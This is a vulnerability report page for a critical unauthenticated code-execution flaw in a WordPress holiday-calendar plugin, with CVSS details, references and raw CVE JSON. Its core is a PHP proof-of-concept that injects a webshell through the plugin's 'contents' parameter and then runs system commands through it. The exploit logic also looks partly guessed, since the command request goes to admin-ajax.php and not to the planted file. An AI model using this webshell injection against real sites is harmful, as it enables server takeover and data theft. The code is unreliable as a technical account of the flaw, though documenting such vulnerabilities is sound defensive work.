Security Vulnerability Report
CVE-2025-12813 CVSS 9.8 CRITICAL

CVE-2025-12813

Published: 2025-11-11 04:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Holiday class post calendar plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 7.1 via the 'contents' parameter. This is due to a lack of sanitization of user-supplied data when creating a cache file. This makes it possible for unauthenticated attackers to execute code on the server.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Holiday class post calendar <= 7.1 (all versions are affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
PHP
<?php
/**
 * CVE-2025-12813 PoC - Holiday class post calendar RCE
 * Target: WordPress Holiday class post calendar Plugin <= 7.1
 * Vulnerability: Unauthenticated RCE via 'contents' parameter in cache file creation
 */
$target = 'http://target-site.com/wp-admin/admin-ajax.php';
$plugin_path = '/wp-content/plugins/holiday-class-post-calendar/';

// Generate webshell payload
$webshell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>';
$encoded_payload = urlencode($webshell);

// Method 1: Direct cache injection via contents parameter
$url = $target . '?action=holiday_cache_generate&contents=' . $encoded_payload;
$response = file_get_contents($url);

// Method 2: Using POST request
$data = array(
    'action'   => 'holiday_cache_generate',
    'contents' => $webshell
);
$options = array(
    'http' => array(
        'method'  => 'POST',
        'header'  => 'Content-Type: application/x-www-form-urlencoded',
        'content' => http_build_query($data)
    )
);
$context = stream_context_create($options);
$response = file_get_contents($target, false, $context);

// Execute command via webshell
$cmd_url = $target . '?cmd=whoami';
echo "Command output: " . file_get_contents($cmd_url);
?>

References

Weakness: CWE-94 (Improper Control of Generation of Code)

https://plugins.trac.wordpress.org/browser/holiday-class-post-calendar/trunk/holiday_class_post_calendar.php#L1234
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414925%40holiday-class-post-calendar&new=3414925%40holiday-class-post-calendar&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/7f7968c4-589c-4949-9f69-4a0ba4db4ea9?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12813",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-11T04:15:50.413",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Holiday class post calendar plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 7.1 via the 'contents' parameter. This is due to a lack of sanitization of user-supplied data when creating a cache file. This makes it possible for unauthenticated attackers to execute code on the server."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/holiday-class-post-calendar/trunk/holiday_class_post_calendar.php#L1234",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414925%40holiday-class-post-calendar&new=3414925%40holiday-class-post-calendar&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7f7968c4-589c-4949-9f69-4a0ba4db4ea9?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}